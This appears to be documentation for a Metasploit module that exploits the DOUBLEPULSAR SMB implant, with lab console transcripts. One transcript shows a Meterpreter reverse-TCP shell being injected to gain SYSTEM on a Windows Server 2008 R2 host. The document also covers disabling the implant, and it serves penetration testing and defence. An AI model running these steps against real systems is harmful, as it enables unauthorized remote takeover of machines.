## Introduction

This module executes a Metasploit payload against the Equation Group's
DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.

While this module primarily performs code execution against the implant,
the `Neutralize implant` target allows you to disable the implant.

## Targets

```
Id  Name
--  ----
0   Execute payload (x64)
1   Neutralize implant
```

## Options

**DefangedMode**

Set this to `false` to disable defanged mode and enable module
functionality. Set this only if you're SURE you want to proceed.

**ProcessName**

Set this to the userland process you want to inject the payload into.
Defaults to `spoolsv.exe`.

## Usage

Pinging the implant:

```
msf5 exploit(windows/smb/smb_doublepulsar_rce) > check

[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
[!] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
[+] 192.168.56.115:445 - The target is vulnerable.
msf5 exploit(windows/smb/smb_doublepulsar_rce) >
```

Executing a payload:

```
msf5 exploit(windows/smb/smb_doublepulsar_rce) > set target Execute\ payload
target => Execute payload
msf5 exploit(windows/smb/smb_doublepulsar_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
[!] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
[*] 192.168.56.115:445 - Generating kernel shellcode with windows/x64/meterpreter/reverse_tcp
[*] 192.168.56.115:445 - Total shellcode length: 4096 bytes
[*] 192.168.56.115:445 - Encrypting shellcode with XOR key 0x33C6DC64
[*] 192.168.56.115:445 - Sending shellcode to DOUBLEPULSAR
[+] 192.168.56.115:445 - Payload execution successful
[*] Sending stage (206403 bytes) to 192.168.56.115
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.115:49158) at 2019-09-25 18:26:47 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-S7TDBIENPVM
OS              : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >
```

Neutralizing the implant:

```
msf5 exploit(windows/smb/smb_doublepulsar_rce) > set target Neutralize\ implant
target => Neutralize implant
msf5 exploit(windows/smb/smb_doublepulsar_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
[!] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
[*] 192.168.56.115:445 - Neutralizing DOUBLEPULSAR
[+] 192.168.56.115:445 - Implant neutralization successful
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/smb_doublepulsar_rce) >
```
